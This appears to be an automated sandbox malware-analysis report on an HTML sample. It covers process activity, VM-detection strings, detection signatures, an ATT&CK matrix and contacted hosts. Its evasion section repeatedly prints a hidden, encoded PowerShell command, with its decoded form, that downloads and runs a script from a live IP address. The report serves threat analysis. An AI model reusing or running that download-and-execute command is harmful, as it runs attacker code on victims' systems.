    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140Thread sleep count: 2493 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8724Thread sleep count: 6563 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1252Thread sleep count: 162 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3544Thread sleep time: -9223372036854770s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2493Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6563Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: explorer.exe, 0000000C.00000000.9961640635.00000000081C8000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
    Source: explorer.exe, 0000000C.00000000.9833336490.000000000074B000.00000004.00000020.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000z
    Source: explorer.exe, 0000000C.00000000.9961915558.0000000008236000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000C.00000000.9885527712.000000000437C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
    Source: explorer.exe, 0000000C.00000000.9883654784.0000000004302000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000C.00000000.9941513322.000000000568F000.00000004.00000001.sdmpBinary or memory string: VMware V
    Source: explorer.exe, 0000000C.00000000.9962482225.00000000082BD000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-
    Source: powershell.exe, 00000016.00000002.10533791656.000001C9472E5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 0000000C.00000000.9833336490.000000000074B000.00000004.00000020.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
    Source: explorer.exe, 0000000C.00000000.9958911327.0000000007740000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.10534697451.000001C947600000.00000002.00000001.sdmpBinary or memory string: Insufficient privileges. Only administrators or users that are members of the Hyper-V Administrators user group are permitted to access virtual machines or containers. To add yourself to the Hyper-V Administrators user group, please see https://aka.ms/hcsadmin for more information.
    Source: explorer.exe, 0000000C.00000000.9961378376.000000000816A000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected Powershell download and executeShow sources
    Source: Yara matchFile source: C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt, type: DROPPED
    Bypasses PowerShell execution policyShow sources
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Encrypted powershell cmdline option foundShow sources
    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX (New-Object Net.Webclient).downloadstring("http://185.244.41.28/click.php")
    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX (New-Object Net.Webclient).downloadstring("http://185.244.41.28/click.php")Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: explorer.exe, 0000000C.00000000.9835683299.0000000000CB1000.00000002.00000001.sdmpBinary or memory string: Program Manager&
    Source: explorer.exe, 0000000C.00000000.9941513322.000000000568F000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 0000000C.00000000.9833336490.000000000074B000.00000004.00000020.sdmpBinary or memory string: Progman
    Source: explorer.exe, 0000000C.00000000.9835683299.0000000000CB1000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter1DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScripting11Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion21LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsPowerShell6Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSVirtualization/Sandbox Evasion21Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 299 Sample: file.html Startdate: 16/08/2021 Architecture: WINDOWS Score: 88 49 wa104381125.resources.office.net 2->49 51 s7d9.scene7.com 2->51 53 7 other IPs or domains 2->53 63 Yara detected Powershell download and execute 2->63 65 Sigma detected: WScript or CScript Dropper 2->65 67 Sigma detected: Suspicious Encoded PowerShell Command Line 2->67 69 Sigma detected: Suspicious Script Execution From Temp Folder 2->69 10 chrome.exe 23 460 2->10         started        signatures3 process4 dnsIp5 55 169.254.68.153 USDOSUS Reserved 10->55 57 192.168.2.1 unknown unknown 10->57 59 2 other IPs or domains 10->59 35 a060a3c3-36d4-4a84-adc3-1316937f3621.tmp, PDP-11 10->35 dropped 37 C:\Users\user\AppData\Local\...\000003.log, DOS 10->37 dropped 39 C:\Users\user\...\DownloadMetadata.. (copy), PDP-11 10->39 dropped 14 explorer.exe 10->14 injected 16 chrome.exe 18 10->16         started        19 chrome.exe 10->19         started        21 3 other processes 10->21 file6 process7 dnsIp8 23 wscript.exe 1 14->23         started        43 accounts.google.com 172.217.168.13, 443, 64780 GOOGLEUS United States 16->43 45 clients.l.google.com 172.217.168.46, 443, 65369 GOOGLEUS United States 16->45 47 7 other IPs or domains 16->47 process9 signatures10 71 Malicious encrypted Powershell command line found 23->71 73 Wscript starts Powershell (via cmd or directly) 23->73 75 PowerShell case anomaly found 23->75 26 cmd.exe 1 23->26         started        process11 signatures12 77 Malicious encrypted Powershell command line found 26->77 79 Suspicious powershell command line found 26->79 81 Wscript starts Powershell (via cmd or directly) 26->81 83 3 other signatures 26->83 29 powershell.exe 14 19 26->29         started        33 conhost.exe 26->33         started        process13 dnsIp14 61 185.244.41.28, 65398, 80 ASKONTELRU Russian Federation 29->61 41 PowerShell_transcr....20210816191151.txt, UTF-8 29->41 dropped file15

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.mercadolivre.com.br/0%URL Reputationsafe
    http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
    http://www.dailymail.co.uk/0%URL Reputationsafe
    http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
    http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
    http://it.search.dada.net/favicon.ico0%URL Reputationsafe
    http://search.hanafos.com/favicon.ico0%URL Reputationsafe
    http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
    http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
    http://buscar.ozu.es/0%Avira URL Cloudsafe
    http://search.auction.co.kr/0%URL Reputationsafe
    http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
    http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
    http://google.pchome.com.tw/0%URL Reputationsafe
    http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
    http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
    http://www.gmarket.co.kr/0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
    http://www.iask.com/0%URL Reputationsafe
    http://service2.bfast.com/0%URL Reputationsafe
    http://www.news.com.au/favicon.ico0%URL Reputationsafe
    http://www.kkbox.com.tw/0%URL Reputationsafe
    http://search.goo.ne.jp/favicon.ico0%URL Reputationsafe
    http://www.etmall.com.tw/0%URL Reputationsafe
    http://www.amazon.co.uk/0%URL Reputationsafe
    http://www.asharqalawsat.com/favicon.ico0%URL Reputationsafe
    http://185.244.41.28/click.php0%Avira URL Cloudsafe
    http://search.ipop.co.kr/0%URL Reputationsafe
    http://www.auction.co.kr/auction.ico0%URL Reputationsafe
    http://www.google.co.uk/0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://buscador.terra.com/favicon.ico0%URL Reputationsafe
    http://search.aol.co.uk/0%URL Reputationsafe
    http://www.excite.co.jp/0%URL Reputationsafe
    http://www.ocn.ne.jp/favicon.ico0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    accounts.google.com
    		172.217.168.13
    		truefalse
      		high
      sb-ssl.l.google.com
      		172.217.168.78
      		truefalse
        		high
        clients.l.google.com
        		172.217.168.46
        		truefalse
          		high
          googlehosted.l.googleusercontent.com
          		172.217.168.65
          		truefalse
            		high
            fa000000064.resources.office.net
            		unknown
            		unknownfalse
              		high
              clients2.googleusercontent.com
              		unknown
              		unknownfalse
                		high
                sb-ssl.google.com
                		unknown
                		unknownfalse
                  		high
                  g.live.com
                  		unknown
                  		unknownfalse
                    		high
                    clients2.google.com
                    		unknown
                    		unknownfalse
                      		high
                      fa000000072.resources.office.net
                      		unknown
                      		unknownfalse
                        		high
                        s7d9.scene7.com
                        		unknown
                        		unknownfalse
                          		high
                          wa104381125.resources.office.net
                          		unknown
                          		unknownfalse
                            		high
                            fa000000068.resources.office.net
                            		unknown
                            		unknownfalse
                              		high
                              fa000000070.resources.office.net
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://185.244.41.28/click.phpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://search.chol.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.mercadolivre.com.br/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.merlin.com.pl/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://apis.google.com/js/client.jsmirroring_common.js.1.drfalse
                                    		high
                                    http://www.dailymail.co.uk/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://fr.search.yahoo.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                      		high
                                      https://aka.ms/hcsadminexplorer.exe, 0000000C.00000000.9958911327.0000000007740000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.10534697451.000001C947600000.00000002.00000001.sdmpfalse
                                        		high
                                        http://in.search.yahoo.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                          		high
                                          http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                            		high
                                            http://msk.afisha.ru/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                              		high
                                              https://www.google.com/accounts/OAuthLogin?issueuberauth=1craw_window.js.1.drfalse
                                                		high
                                                https://android.notify.windows.com/iOSdexplorer.exe, 0000000C.00000000.9962249157.0000000008284000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.ya.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.etmall.com.tw/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://it.search.dada.net/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://aka.ms/Vh5j3kxexplorer.exe, 0000000C.00000000.9886666253.00000000043E1000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://search.hanafos.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensionsmirroring_hangouts.js.1.drfalse
                                                        		high
                                                        http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://aka.ms/odirm8explorer.exe, 0000000C.00000000.9886666253.00000000043E1000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://search.msn.co.jp/results.aspx?q=explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://buscar.ozu.es/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.ask.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.google.it/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://search.auction.co.kr/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.amazon.de/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://sads.myspace.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    https://hangouts.google.com/_/logprefmirroring_hangouts.js.1.drfalse
                                                                      		high
                                                                      http://www.pchome.com.tw/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://browse.guardian.co.uk/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://google.pchome.com.tw/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.rambler.ru/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://uk.search.yahoo.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://search.sify.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                              		high
